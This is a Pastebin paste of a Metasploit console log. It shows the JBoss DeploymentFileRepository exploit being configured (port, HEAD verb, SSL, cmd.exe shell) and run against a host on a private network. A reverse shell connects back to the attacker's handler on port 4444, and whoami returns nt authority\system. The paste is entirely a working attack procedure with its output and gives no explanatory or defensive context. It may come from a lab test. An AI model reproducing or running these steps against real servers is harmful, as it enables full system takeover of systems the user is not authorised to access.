Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(jboss_deploymentfilerepository) > set RPORT 9363
- RPORT => 9363
- msf exploit(jboss_deploymentfilerepository) > set VERB HEAD
- VERB => HEAD
- msf exploit(jboss_deploymentfilerepository) > set SSL TRUE
- SSL => TRUE
- msf exploit(jboss_deploymentfilerepository) > set SHELL cmd.exe
- SHELL => cmd.exe
- msf exploit(jboss_deploymentfilerepository) > exploit
- [*] Started reverse handler on 172.16.5.1:4444
- [*] Triggering payload at '/mWWQ5CF1T2no/CmTVlgu5w.jsp'...
- [-] Execution failed on '/mWWQ5CF1T2no/CmTVlgu5w.jsp' [No Response], retrying...
- [*] Command shell session 5 opened (172.16.5.1:4444 -> 172.16.5.132:1058) at Wed Mar 09 09:00:12 -0700 2011
- [-] Exploit exception: Interrupt
- C:\Program Files\PostgresPlus\8.4AS\mgmtsvr\bin>whoami
- whoami
- nt authority\system
- C:\Program Files\PostgresPlus\8.4AS\mgmtsvr\bin>
Add Comment
Please, Sign In to add comment